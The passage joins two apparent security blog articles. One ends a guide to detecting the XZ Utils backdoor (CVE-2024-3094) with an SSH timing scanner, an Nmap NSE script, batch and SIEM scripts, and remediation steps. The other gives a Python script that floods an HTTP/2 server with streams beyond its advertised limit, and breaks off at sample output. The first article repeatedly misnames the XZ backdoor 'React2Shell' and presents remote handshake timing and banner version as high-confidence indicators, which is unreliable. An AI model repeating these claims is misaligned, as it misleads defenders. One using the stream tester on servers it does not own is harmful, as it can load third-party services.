Usage:

# Basic scan
./ssh_backdoor_scanner.py example.com

# Custom port
./ssh_backdoor_scanner.py example.com -p 2222

# Extended timeout for high latency networks
./ssh_backdoor_scanner.py example.com -t 15

Output Interpretation:

[*] Testing SSH handshake timing for example.com:22...
    SSH Banner: SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1
    Handshake Time: 782.3ms
    [SUSPICIOUS] Unusually slow handshake (>500ms)

[*] Testing authentication timing patterns...
    Auth Response Time: 1205.7ms
    [SUSPICIOUS] Unusual authentication delay (>800ms)

Status: LIKELY VULNERABLE
Confidence: HIGH
Suspicious Indicators: 3

Nmap NSE Script Integration

For integration with existing security scanning workflows, an Nmap NSE script provides standardized vulnerability reporting. Nmap Scripting Engine (NSE) scripts are written in Lua and leverage Nmap’s network scanning capabilities. Understanding NSE Script Structure NMAP NSE scripts follow a specific structure that integrates with Nmap’s scanning engine. Create the React2Shell detection script with:

cat > react2shell-detect.nse << 'EOF'
local shortport = require "shortport"
local stdnse = require "stdnse"
local ssh1 = require "ssh1"
local ssh2 = require "ssh2"
local string = require "string"
local nmap = require "nmap"

description = [[
Detects potential React2Shell (CVE-2024-3094) backdoor vulnerability in SSH servers.

This script tests for the backdoored XZ Utils vulnerability by:
1. Analyzing SSH banner information
2. Measuring authentication timing anomalies
3. Testing for unusual SSH handshake behavior
4. Detecting timing delays characteristic of the backdoor
]]

author = "Security Researcher"
license = "Same as Nmap"
categories = {"vuln", "safe", "intrusive"}

portrule = shortport.port_or_service(22, "ssh", "tcp", "open")

-- Timing thresholds (in milliseconds)
local HANDSHAKE_NORMAL = 200
local HANDSHAKE_SUSPICIOUS = 500
local AUTH_NORMAL = 300
local AUTH_SUSPICIOUS = 800

action = function(host, port)
  local output = stdnse.output_table()
  local vuln_table = {
    title = "React2Shell SSH Backdoor (CVE-2024-3094)",
    state = "NOT VULNERABLE",
    risk_factor = "Critical",
    references = {
      "https://nvd.nist.gov/vuln/detail/CVE-2024-3094",
      "https://www.openwall.com/lists/oss-security/2024/03/29/4"
    }
  }
  
  local script_args = {
    timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 10,
    auth_threshold = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".auth-threshold")) or AUTH_SUSPICIOUS
  }
  
  local socket = nmap.new_socket()
  socket:set_timeout(script_args.timeout * 1000)
  
  local detection_results = {}
  local suspicious_count = 0
  
  -- Test 1: SSH Banner and Initial Handshake
  local start_time = nmap.clock_ms()
  local status, err = socket:connect(host, port)
  
  if not status then
    return nil
  end
  
  local banner_status, banner = socket:receive_lines(1)
  local handshake_time = nmap.clock_ms() - start_time
  
  if not banner_status then
    socket:close()
    return nil
  end
  
  detection_results["SSH Banner"] = banner:gsub("[\r\n]", "")
  detection_results["Handshake Time"] = string.format("%dms", handshake_time)
  
  if handshake_time > HANDSHAKE_SUSPICIOUS then
    detection_results["Handshake Analysis"] = string.format("SUSPICIOUS (%dms > %dms)", 
                                                             handshake_time, HANDSHAKE_SUSPICIOUS)
    suspicious_count = suspicious_count + 1
  else
    detection_results["Handshake Analysis"] = "Normal"
  end
  
  socket:close()
  
  -- Test 2: Authentication Timing Probe
  socket = nmap.new_socket()
  socket:set_timeout(script_args.timeout * 1000)
  
  status = socket:connect(host, port)
  if not status then
    output["Detection Results"] = detection_results
    return output
  end
  
  socket:receive_lines(1)
  
  local client_banner = "SSH-2.0-OpenSSH_9.0_Nmap_Scanner\r\n"
  socket:send(client_banner)
  
  start_time = nmap.clock_ms()
  local kex_status, kex_data = socket:receive()
  local auth_time = nmap.clock_ms() - start_time
  
  socket:close()
  
  detection_results["Auth Probe Time"] = string.format("%dms", auth_time)
  
  if auth_time > script_args.auth_threshold then
    detection_results["Auth Analysis"] = string.format("SUSPICIOUS (%dms > %dms)", 
                                                        auth_time, script_args.auth_threshold)
    suspicious_count = suspicious_count + 2
  else
    detection_results["Auth Analysis"] = "Normal"
  end
  
  -- Banner Analysis
  local banner_lower = banner:lower()
  if banner_lower:match("debian") or banner_lower:match("ubuntu") then
    detection_results["Distribution"] = "Debian/Ubuntu (higher risk)"
    
    if banner_lower:match("openssh_9%.6") or banner_lower:match("openssh_9%.7") then
      detection_results["Version Note"] = "OpenSSH version commonly affected"
      suspicious_count = suspicious_count + 1
    end
  end
  
  vuln_table["Detection Results"] = detection_results
  
  if suspicious_count >= 3 then
    vuln_table.state = "LIKELY VULNERABLE"
    vuln_table["Confidence"] = "HIGH"
  elseif suspicious_count >= 2 then
    vuln_table.state = "POSSIBLY VULNERABLE"
    vuln_table["Confidence"] = "MEDIUM"
  elseif suspicious_count >= 1 then
    vuln_table.state = "SUSPICIOUS"
    vuln_table["Confidence"] = "LOW"
  end
  
  vuln_table["Indicators Found"] = string.format("%d suspicious indicators", suspicious_count)
  
  if vuln_table.state ~= "NOT VULNERABLE" then
    vuln_table["Recommendation"] = [[
1. Verify XZ Utils version on target
2. Check if SSH daemon links to liblzma
3. Review SSH authentication logs
4. Consider isolating system pending investigation
    ]]
  end
  
  return vuln_table
end
EOF

Installation:

# Copy to Nmap scripts directory
sudo cp react2shell-detect.nse /usr/local/share/nmap/scripts/

# Update script database
nmap --script-updatedb

Usage Examples:

# Single host scan
nmap -p 22 --script react2shell-detect example.com

# Subnet scan
nmap -p 22 --script react2shell-detect 192.168.1.0/24

# Multiple ports
nmap -p 22,2222,2200 --script react2shell-detect target.com

# Custom thresholds
nmap --script react2shell-detect \
     --script-args='react2shell-detect.auth-threshold=600' \
     -p 22 example.com

Output Format:

PORT   STATE SERVICE
22/tcp open  ssh
| react2shell-detect:
|   VULNERABLE:
|   React2Shell SSH Backdoor (CVE-2024-3094)
|     State: LIKELY VULNERABLE
|     Risk factor: Critical
|     Detection Results:
|       - SSH Banner: OpenSSH_9.6p1 Debian-5ubuntu1
|       - Handshake Time: 625ms
|       - Auth Delay: 1150ms (SUSPICIOUS - threshold 800ms)
|       - Connection Pattern: Avg: 680ms, Variance: 156.3
|       - Distribution: Debian/Ubuntu-based (higher risk profile)
|     
|     Indicators Found: 3 suspicious indicators
|     Confidence: HIGH - Multiple indicators detected
|     
|     Recommendation:
|     1. Verify XZ Utils version on the target
|     2. Check if SSH daemon links to liblzma
|     3. Review SSH authentication logs for anomalies
|     4. Consider isolating system pending investigation

Batch Scanning Infrastructure

For security teams managing large deployments, automated batch scanning provides continuous monitoring:

Scripted Scanning:

#!/bin/bash
# Enterprise batch scanner

SERVERS_FILE="production_servers.txt"
RESULTS_DIR="scan_results_$(date +%Y%m%d)"
ALERT_THRESHOLD=2

mkdir -p "$RESULTS_DIR"

while IFS=':' read -r hostname port || [ -n "$hostname" ]; do
    port=${port:-22}
    echo "[$(date)] Scanning $hostname:$port"

    # Run scan and save results
    ./ssh_backdoor_scanner.py "$hostname" -p "$port" \
        > "$RESULTS_DIR/${hostname}_${port}.txt" 2>&1

    # Check for vulnerabilities
    suspicious=$(grep "Suspicious Indicators:" "$RESULTS_DIR/${hostname}_${port}.txt" \
                | grep -oE '[0-9]+')

    if [ "$suspicious" -ge "$ALERT_THRESHOLD" ]; then
        echo "ALERT: $hostname:$port shows $suspicious indicators" \
            | mail -s "CVE-2024-3094 Detection Alert" security@company.com
    fi

    # Rate limiting to avoid overwhelming targets
    sleep 2
done < "$SERVERS_FILE"

# Generate summary report
echo "Scan Summary - $(date)" > "$RESULTS_DIR/summary.txt"
grep -l "VULNERABLE" "$RESULTS_DIR"/*.txt | wc -l \
    >> "$RESULTS_DIR/summary.txt"

Server List Format (production_servers.txt):

web-01.production.company.com
web-02.production.company.com:22
database-master.internal:2222
bastion.external.company.com
10.0.1.50
10.0.1.51:2200

SIEM Integration

For enterprise environments with Security Information and Event Management systems:

#!/bin/bash
# SIEM integration script

SYSLOG_SERVER="siem.company.com"
SYSLOG_PORT=514

scan_and_log() {
    local host=$1
    local port=${2:-22}

    result=$(./ssh_backdoor_scanner.py "$host" -p "$port" 2>&1)

    if echo "$result" | grep -q "VULNERABLE"; then
        severity="CRITICAL"
        priority=2
    elif echo "$result" | grep -q "SUSPICIOUS"; then
        severity="WARNING"
        priority=4
    else
        severity="INFO"
        priority=6
    fi

    # Send to syslog
    logger -n "$SYSLOG_SERVER" -P "$SYSLOG_PORT" \
           -p "local0.$priority" \
           -t "react2shell-scan" \
           "[$severity] CVE-2024-3094 scan: host=$host:$port result=$severity"
}

# Scan from asset inventory
while read server; do
    scan_and_log $server
done < asset_inventory.txt

Remediation Steps

Immediate Response for Vulnerable Systems

When a system is identified as potentially compromised:

Step 1: Verify the Finding

# Connect to the system (if possible)
ssh admin@suspicious-server

# Check XZ version
xz --version
# Look for: xz (XZ Utils) 5.6.0 or 5.6.1

# Verify SSH linkage
ldd $(which sshd) | grep liblzma
# If present, check version:
# readlink -f /lib/x86_64-linux-gnu/liblzma.so.5

Step 2: Assess Potential Compromise

# Review authentication logs
grep -E 'Accepted|Failed' /var/log/auth.log | tail -100

# Check for suspicious authentication patterns
# - Successful authentications without corresponding key/password attempts
# - Authentications from unexpected source IPs
# - User accounts that shouldn't have SSH access

# Review active sessions
w
last -20

# Check for unauthorized SSH keys
find /home -name authorized_keys -exec cat {} \;
find /root -name authorized_keys -exec cat {} \;

# Look for unusual processes
ps auxf | less

Step 3: Immediate Containment

If compromise is suspected:

# Isolate the system from network
# Save current state for forensics first
netstat -tupan > /tmp/netstat_snapshot.txt
ps auxf > /tmp/process_snapshot.txt

# Then block incoming SSH
iptables -I INPUT -p tcp --dport 22 -j DROP

# Or shutdown SSH entirely
systemctl stop ssh

Step 4: Remediation

For systems with the vulnerable version but no evidence of compromise:

# Debian/Ubuntu systems
apt-get update
apt-get install --only-upgrade xz-utils

# Verify the new version
xz --version
# Should show 5.4.x or 5.5.x

# Alternative: Explicit downgrade
apt-get install xz-utils=5.4.5-0.3

# Restart SSH to unload old library
systemctl restart ssh

Step 5: Post Remediation Verification

# Verify library version
readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# Should NOT be 5.6.0 or 5.6.1

# Confirm SSH no longer shows timing anomalies
# Run scanner again from remote system
./ssh_backdoor_scanner.py remediated-server.com

# Monitor for a period
tail -f /var/log/auth.log

System Hardening Post Remediation

After removing the backdoor, implement additional protections:

SSH Configuration Hardening:

Create a secure SSH configuration:

# Edit /etc/ssh/sshd_config

# Disable password authentication
PasswordAuthentication no

# Limit authentication methods
PubkeyAuthentication yes
ChallengeResponseAuthentication no

# Restrict user access
AllowUsers admin deploy monitoring

# Enable additional logging
LogLevel VERBOSE

# Restart SSH
systemctl restart ssh

Monitoring Implementation:

cat > /etc/fail2ban/jail.local << 'EOF'
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 3
bantime = 3600
findtime = 600
EOF

systemctl restart fail2ban

Regular Scanning:

Add automated checking to crontab:

# Create monitoring script
cat > /usr/local/bin/check_xz_backdoor.sh << 'EOF'
#!/bin/bash
/usr/local/bin/ssh_backdoor_scanner.py localhost > /var/log/xz_check.log 2>&1
EOF

chmod +x /usr/local/bin/check_xz_backdoor.sh

# Add to crontab
echo "0 2 * * * /usr/local/bin/check_xz_backdoor.sh" | crontab 

Lessons for the Security Community

Supply Chain Security Imperatives

This attack highlights critical vulnerabilities in the open source ecosystem:

Maintainer Burnout: Many critical projects rely on volunteer maintainers working in isolation. The XZ Utils maintainer was a single individual managing a foundational library with limited resources and support.

Trust But Verify: The security community must develop better mechanisms for verifying not just code contributions, but also the contributors themselves. Multi-year social engineering campaigns can bypass traditional code review.

Automated Analysis: Build systems and binary artifacts must receive the same scrutiny as source code. The XZ backdoor succeeded partly because attention focused on C source files while malicious build scripts and test files went unexamined.

Dependency Awareness: Understanding indirect dependency chains is critical. Few would have identified XZ Utils as SSH-related, yet this unexpected connection enabled the attack.

Detection Strategy Evolution

The fortuitous discovery of this backdoor through performance testing suggests the security community needs new approaches:

Behavioral Baselining: Systems should establish performance baselines for critical services. Deviations, even subtle ones, warrant investigation.

Timing Analysis: Side-channel attacks aren’t just theoretical concerns. Timing differences can reveal malicious code even when traditional signatures fail.

Continuous Monitoring: Point-in-time security assessments miss time-based attacks. Continuous behavioral monitoring can detect anomalies as they emerge.

Cross-Discipline Collaboration: The backdoor was discovered by a database developer doing performance testing, not a security researcher. Encouraging collaboration across disciplines improves security outcomes.

Infrastructure Recommendations

Organizations should implement:

Binary Verification: Don’t just verify source code. Ensure build processes are deterministic and reproducible. Compare binaries across different build environments.

Runtime Monitoring: Deploy tools that can detect unexpected library loading, function hooking, and behavioral anomalies in production systems.

Network Segmentation: Limit the blast radius of compromised systems through proper network segmentation and access controls.

Incident Response Preparedness: Have procedures ready for supply chain compromises, including rapid version rollback and system isolation capabilities.

The Role of Timing in Security

This attack demonstrates the importance of performance analysis in security:

Performance as Security Signal: Unexplained performance degradation should trigger security investigation, not just performance optimization.

Side Channel Awareness: Developers should understand that any observable behavior, including timing, can reveal system state and potential compromise.

Benchmark Everything: Establish performance baselines for critical systems and alert on deviations.

Conclusion

CVE-2024-3094 represents a watershed moment in supply chain security. The sophistication of the attack, spanning years of social engineering and technical preparation, demonstrates that determined adversaries can compromise even well-maintained open source projects.

The backdoor’s discovery was largely fortuitous, happening during unrelated performance testing just before the compromised versions would have reached production systems worldwide. This near-miss should serve as a wake-up call for the entire security community.

The detection tools and methodologies presented in this article provide practical means for identifying compromised systems. However, the broader lesson is that security requires constant vigilance, comprehensive monitoring, and a willingness to investigate subtle anomalies that might otherwise be dismissed as performance issues.

As systems become more complex and supply chains more intricate, the attack surface expands beyond traditional code vulnerabilities to include the entire software development and distribution process. Defending against such attacks requires not just better tools, but fundamental changes in how we approach trust, verification, and monitoring in software systems.

The React2Shell backdoor was detected and neutralized before widespread exploitation. The next supply chain attack may not be discovered so quickly, or so fortunately. The time to prepare is now.

Additional Resources

Technical References

National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-3094

OpenWall Disclosure: https://www.openwall.com/lists/oss-security/2024/03/29/4

Technical Analysis by Sam James: https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27

Detection Tools

The scanner tools discussed in this article are available for download and can be deployed in production environments for ongoing monitoring. They require no authentication to the target systems and work by analyzing observable timing behavior in the SSH handshake and authentication process.

These tools should be integrated into regular security scanning procedures alongside traditional vulnerability scanners and intrusion detection systems.

Indicators of Compromise

XZ Utils version 5.6.0 or 5.6.1 installed

SSH daemon (sshd) linking to liblzma library

Unusual SSH authentication timing (>800ms for auth probe)

High variance in SSH connection establishment times

Recent XZ Utils updates from February or March 2024

Debian or Ubuntu systems with systemd enabled SSH

OpenSSH versions 9.6 or 9.7 on Debian-based distributions

Recommended Actions

Scan all SSH-accessible systems for timing anomalies

Verify XZ Utils versions across your infrastructure

Review SSH authentication logs for suspicious patterns

Implement continuous monitoring for behavioral anomalies

Establish performance baselines for critical services

Develop incident response procedures for supply chain compromises

Consider additional SSH hardening measures

Review and audit all open source dependencies in your environment

0
0

Testing Maximum HTTP/2 Concurrent Streams for Your Website

1. Introduction

Understanding and testing your server’s maximum concurrent stream configuration is critical for both performance tuning and security hardening against HTTP/2 attacks. This guide provides comprehensive tools and techniques to test the SETTINGS_MAX_CONCURRENT_STREAMS parameter on your web servers.

This article complements our previous guide on Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS. While that article focuses on the CVE-2023-44487 Rapid Reset attack, this guide helps you verify that your server properly enforces stream limits, which is a critical defense mechanism.

2. Why Test Stream Limits?

The SETTINGS_MAX_CONCURRENT_STREAMS setting determines how many concurrent requests a client can multiplex over a single HTTP/2 connection. Testing this limit is important because:

  1. Security validation: Confirms your server enforces reasonable stream limits
  2. Configuration verification: Ensures your settings match security recommendations (typically 100-128 streams)
  3. Performance tuning: Helps optimize the balance between throughput and resource consumption
  4. Attack surface assessment: Identifies if servers accept dangerously high stream counts

3. Understanding HTTP/2 Stream Limits

When an HTTP/2 connection is established, the server sends a SETTINGS frame that includes:

SETTINGS_MAX_CONCURRENT_STREAMS: 100

This tells the client the maximum number of concurrent streams allowed. A compliant client should respect this limit, but attackers will not.

3.1. Common Default Values

Web Servers:

  • Nginx: 128 (configurable via http2_max_concurrent_streams)
  • Apache: 100 (configurable via H2MaxSessionStreams)
  • Caddy: 250 (configurable via max_concurrent_streams)
  • LiteSpeed: 100 (configurable in admin panel)

Reverse Proxies and Load Balancers:

  • HAProxy: No default limit (should be explicitly configured)
  • Envoy: 100 (configurable via max_concurrent_streams)
  • Traefik: 250 (configurable via maxConcurrentStreams)

CDN and Cloud Services:

  • CloudFlare: 128 (managed automatically)
  • AWS ALB: 128 (managed automatically)
  • Azure Front Door: 100 (managed automatically)

4. The Stream Limit Testing Script

The following Python script tests your server’s maximum concurrent streams using the h2 library. This script will:

  • Connect to your HTTP/2 server
  • Read the advertised SETTINGS_MAX_CONCURRENT_STREAMS value
  • Attempt to open more streams than the advertised limit
  • Verify that the server actually enforces the limit
  • Provide detailed results and recommendations

4.1. Prerequisites

Install the required Python libraries:

pip3 install h2 hyper --break-system-packages

Verify installation:

python3 -c "import h2; print(f'h2 version: {h2.__version__}')"

4.2. Complete Script

Save the following as http2_stream_limit_tester.py:

#!/usr/bin/env python3
"""
HTTP/2 Maximum Concurrent Streams Tester

Tests the SETTINGS_MAX_CONCURRENT_STREAMS limit on HTTP/2 servers
and attempts to exceed it to verify enforcement.

Usage:
    python3 http2_stream_limit_tester.py --host example.com --port 443

Requirements:
    pip3 install h2 hyper --break-system-packages
"""

import argparse
import socket
import ssl
import time
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass, field

try:
    from h2.connection import H2Connection
    from h2.config import H2Configuration
    from h2.events import (
        RemoteSettingsChanged,
        StreamEnded,
        DataReceived,
        StreamReset,
        WindowUpdated,
        SettingsAcknowledged,
        ResponseReceived
    )
    from h2.exceptions import ProtocolError
except ImportError:
    print("Error: h2 library not installed")
    print("Install with: pip3 install h2 hyper --break-system-packages")
    exit(1)


@dataclass
class StreamLimitTestResults:
    """Results from stream limit testing"""
    advertised_max_streams: Optional[int] = None
    actual_max_streams: int = 0
    successful_streams: int = 0
    failed_streams: int = 0
    reset_streams: int = 0
    enforcement_detected: bool = False
    test_duration: float = 0.0
    server_settings: Dict = field(default_factory=dict)
    errors: List[str] = field(default_factory=list)


class HTTP2StreamLimitTester:
    """Test HTTP/2 server stream limits"""

    def __init__(
        self,
        host: str,
        port: int = 443,
        path: str = "/",
        use_tls: bool = True,
        timeout: int = 30,
        verbose: bool = False
    ):
        self.host = host
        self.port = port
        self.path = path
        self.use_tls = use_tls
        self.timeout = timeout
        self.verbose = verbose

        self.socket: Optional[socket.socket] = None
        self.h2_conn: Optional[H2Connection] = None
        self.server_max_streams: Optional[int] = None
        self.active_streams: Dict[int, dict] = {}

    def connect(self) -> bool:
        """Establish connection to the server"""
        try:
            # Create socket
            self.socket = socket.create_connection(
                (self.host, self.port),
                timeout=self.timeout
            )

            # Wrap with TLS if needed
            if self.use_tls:
                context = ssl.create_default_context()
                context.check_hostname = True
                context.verify_mode = ssl.CERT_REQUIRED

                # Set ALPN protocols for HTTP/2
                context.set_alpn_protocols(['h2', 'http/1.1'])

                self.socket = context.wrap_socket(
                    self.socket,
                    server_hostname=self.host
                )

                # Verify HTTP/2 was negotiated
                negotiated_protocol = self.socket.selected_alpn_protocol()
                if negotiated_protocol != 'h2':
                    raise Exception(f"HTTP/2 not negotiated. Got: {negotiated_protocol}")

                if self.verbose:
                    print(f"TLS connection established (ALPN: {negotiated_protocol})")

            # Initialize HTTP/2 connection
            config = H2Configuration(client_side=True)
            self.h2_conn = H2Connection(config=config)
            self.h2_conn.initiate_connection()

            # Send connection preface
            self.socket.sendall(self.h2_conn.data_to_send())

            # Receive server settings
            self._receive_data()

            if self.verbose:
                print(f"HTTP/2 connection established to {self.host}:{self.port}")

            return True

        except Exception as e:
            if self.verbose:
                print(f"Connection failed: {e}")
            return False

    def _receive_data(self, timeout: Optional[float] = None) -> List:
        """Receive and process data from server"""
        if timeout:
            self.socket.settimeout(timeout)
        else:
            self.socket.settimeout(self.timeout)

        events = []
        try:
            data = self.socket.recv(65536)
            if not data:
                return events

            events_received = self.h2_conn.receive_data(data)

            for event in events_received:
                events.append(event)

                if isinstance(event, RemoteSettingsChanged):
                    self._handle_settings(event)
                elif isinstance(event, ResponseReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Response received")
                elif isinstance(event, DataReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Data received ({len(event.data)} bytes)")
                elif isinstance(event, StreamEnded):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Ended normally")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['ended'] = True
                elif isinstance(event, StreamReset):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Reset (error code: {event.error_code})")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['reset'] = True

            # Send any pending data
            data_to_send = self.h2_conn.data_to_send()
            if data_to_send:
                self.socket.sendall(data_to_send)

        except socket.timeout:
            pass
        except Exception as e:
            if self.verbose:
                print(f"Error receiving data: {e}")

        return events

    def _handle_settings(self, event: RemoteSettingsChanged):
        """Handle server settings"""
        for setting, value in event.changed_settings.items():
            setting_name = setting.name if hasattr(setting, 'name') else str(setting)

            if self.verbose:
                print(f"  Server setting: {setting_name} = {value}")

            # Check for MAX_CONCURRENT_STREAMS
            if 'MAX_CONCURRENT_STREAMS' in setting_name:
                self.server_max_streams = value
                if self.verbose:
                    print(f"Server advertises max concurrent streams: {value}")

    def send_stream_request(self, stream_id: int) -> bool:
        """Send a GET request on a specific stream"""
        try:
            headers = [
                (':method', 'GET'),
                (':path', self.path),
                (':scheme', 'https' if self.use_tls else 'http'),
                (':authority', self.host),
                ('user-agent', 'HTTP2-Stream-Limit-Tester/1.0'),
            ]

            self.h2_conn.send_headers(stream_id, headers, end_stream=True)
            data_to_send = self.h2_conn.data_to_send()

            if data_to_send:
                self.socket.sendall(data_to_send)

            self.active_streams[stream_id] = {
                'sent': time.time(),
                'ended': False,
                'reset': False
            }

            return True

        except ProtocolError as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Protocol error - {e}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Failed to send - {e}")
            return False

    def test_concurrent_streams(
        self,
        max_streams_to_test: int = 200,
        batch_size: int = 10,
        delay_between_batches: float = 0.1
    ) -> StreamLimitTestResults:
        """
        Test maximum concurrent streams by opening multiple streams

        Args:
            max_streams_to_test: Maximum number of streams to attempt
            batch_size: Number of streams to open per batch
            delay_between_batches: Delay in seconds between batches
        """
        results = StreamLimitTestResults()
        start_time = time.time()

        print(f"\nTesting HTTP/2 Stream Limits:")
        print(f"  Target: {self.host}:{self.port}")
        print(f"  Max streams to test: {max_streams_to_test}")
        print(f"  Batch size: {batch_size}")
        print("=" * 60)

        try:
            # Connect and get initial settings
            if not self.connect():
                results.errors.append("Failed to establish connection")
                return results

            results.advertised_max_streams = self.server_max_streams

            if self.server_max_streams:
                print(f"\nServer advertised limit: {self.server_max_streams} concurrent streams")
            else:
                print(f"\nServer did not advertise MAX_CONCURRENT_STREAMS limit")

            # Start opening streams in batches
            stream_id = 1  # HTTP/2 client streams use odd numbers
            streams_opened = 0

            while streams_opened < max_streams_to_test:
                batch_count = min(batch_size, max_streams_to_test - streams_opened)

                print(f"\nOpening batch of {batch_count} streams (total: {streams_opened + batch_count})...")

                for _ in range(batch_count):
                    if self.send_stream_request(stream_id):
                        results.successful_streams += 1
                        streams_opened += 1
                    else:
                        results.failed_streams += 1

                    stream_id += 2  # Increment by 2 (odd numbers only)

                # Process any responses
                self._receive_data(timeout=0.5)

                # Check for resets
                reset_count = sum(1 for s in self.active_streams.values() if s.get('reset', False))
                if reset_count > results.reset_streams:
                    new_resets = reset_count - results.reset_streams
                    results.reset_streams = reset_count
                    print(f"  WARNING: {new_resets} stream(s) were reset by server")

                    # If we're getting lots of resets, enforcement is happening
                    if reset_count > (results.successful_streams * 0.1):
                        results.enforcement_detected = True
                        print(f"  Stream limit enforcement detected")

                # Small delay between batches
                if delay_between_batches > 0 and streams_opened < max_streams_to_test:
                    time.sleep(delay_between_batches)

            # Final data reception
            print(f"\nWaiting for final responses...")
            for _ in range(5):
                self._receive_data(timeout=1.0)

            # Calculate actual max streams achieved
            results.actual_max_streams = results.successful_streams - results.reset_streams

        except Exception as e:
            results.errors.append(f"Test error: {str(e)}")
            if self.verbose:
                import traceback
                traceback.print_exc()

        finally:
            results.test_duration = time.time() - start_time
            self.close()

        return results

    def display_results(self, results: StreamLimitTestResults):
        """Display test results"""
        print("\n" + "=" * 60)
        print("STREAM LIMIT TEST RESULTS")
        print("=" * 60)

        print(f"\nServer Configuration:")
        print(f"  Advertised max streams:  {results.advertised_max_streams or 'Not specified'}")

        print(f"\nTest Statistics:")
        print(f"  Successful stream opens: {results.successful_streams}")
        print(f"  Failed stream opens:     {results.failed_streams}")
        print(f"  Streams reset by server: {results.reset_streams}")
        print(f"  Actual max achieved:     {results.actual_max_streams}")
        print(f"  Test duration:           {results.test_duration:.2f}s")

        print(f"\nEnforcement:")
        if results.enforcement_detected:
            print(f"  Stream limit enforcement: DETECTED")
        else:
            print(f"  Stream limit enforcement: NOT DETECTED")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        # Provide recommendations
        if results.advertised_max_streams and results.advertised_max_streams > 128:
            print(f"\nWARNING: Advertised limit ({results.advertised_max_streams}) exceeds recommended maximum (128)")
            print("  Consider reducing http2_max_concurrent_streams")
        elif results.advertised_max_streams and results.advertised_max_streams <= 128:
            print(f"\nAdvertised limit ({results.advertised_max_streams}) is within recommended range")

        if not results.enforcement_detected and results.actual_max_streams > 150:
            print(f"\nWARNING: Opened {results.actual_max_streams} streams without enforcement")
            print("  Server may be vulnerable to stream exhaustion attacks")
        elif results.enforcement_detected:
            print(f"\nServer actively enforces stream limits")
            print("  Stream limit protection is working correctly")

        if results.errors:
            print(f"\nErrors encountered:")
            for error in results.errors:
                print(f"  {error}")

        print("=" * 60 + "\n")

    def close(self):
        """Close the connection"""
        try:
            if self.h2_conn:
                self.h2_conn.close_connection()
                if self.socket:
                    data_to_send = self.h2_conn.data_to_send()
                    if data_to_send:
                        self.socket.sendall(data_to_send)

            if self.socket:
                self.socket.close()

            if self.verbose:
                print("Connection closed")
        except Exception as e:
            if self.verbose:
                print(f"Error closing connection: {e}")


def main():
    parser = argparse.ArgumentParser(
        description='Test HTTP/2 server maximum concurrent streams',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test
  python3 http2_stream_limit_tester.py --host example.com

  # Test with custom parameters
  python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

  # Verbose output
  python3 http2_stream_limit_tester.py --host example.com --verbose

  # Test specific path
  python3 http2_stream_limit_tester.py --host example.com --path /api/health

  # Test non-TLS HTTP/2 (h2c)
  python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Prerequisites:
  pip3 install h2 hyper --break-system-packages
        """
    )

    parser.add_argument('--host', required=True, help='Target hostname')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--path', default='/', help='Request path (default: /)')
    parser.add_argument('--no-tls', action='store_true', help='Disable TLS (for h2c testing)')
    parser.add_argument('--max-streams', type=int, default=200,
                       help='Maximum streams to test (default: 200)')
    parser.add_argument('--batch', type=int, default=10,
                       help='Streams per batch (default: 10)')
    parser.add_argument('--delay', type=float, default=0.1,
                       help='Delay between batches in seconds (default: 0.1)')
    parser.add_argument('--timeout', type=int, default=30,
                       help='Connection timeout in seconds (default: 30)')
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    print("=" * 60)
    print("HTTP/2 Maximum Concurrent Streams Tester")
    print("=" * 60)

    tester = HTTP2StreamLimitTester(
        host=args.host,
        port=args.port,
        path=args.path,
        use_tls=not args.no_tls,
        timeout=args.timeout,
        verbose=args.verbose
    )

    try:
        results = tester.test_concurrent_streams(
            max_streams_to_test=args.max_streams,
            batch_size=args.batch,
            delay_between_batches=args.delay
        )

        tester.display_results(results)

    except KeyboardInterrupt:
        print("\n\nTest interrupted by user")
    except Exception as e:
        print(f"\nFatal error: {e}")
        if args.verbose:
            import traceback
            traceback.print_exc()


if __name__ == '__main__':
    main()

5. Using the Script

5.1. Basic Usage

Test your server with default settings:

python3 http2_stream_limit_tester.py --host example.com

5.2. Advanced Examples

Test with increased stream count:

python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

Verbose output for debugging:

python3 http2_stream_limit_tester.py --host example.com --verbose

Test specific API endpoint:

python3 http2_stream_limit_tester.py --host api.example.com --path /v1/health

Test non-TLS HTTP/2 (h2c):

python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Gradual escalation test:

# Start conservative
python3 http2_stream_limit_tester.py --host example.com --max-streams 50

# Increase if server handles well
python3 http2_stream_limit_tester.py --host example.com --max-streams 100

# Push to limits
python3 http2_stream_limit_tester.py --host example.com --max-streams 200

Fast burst test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 150 --batch 30 --delay 0.01

Slow ramp test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 200 --batch 5 --delay 0.5

6. Understanding the Results

The script provides detailed output including:

  1. Advertised max streams: What the server claims to support
  2. Successful stream opens: How many streams were successfully created
  3. Failed stream opens: Streams that failed to open
  4. Streams reset by server: Streams terminated by the server (enforcement)
  5. Actual max achieved: The real concurrent stream limit

6.1. Example Output

Testing HTTP/2 Stream Limits:
  Target: example.com:443
  Max streams to test: 200
  Batch size: 10
============================================================

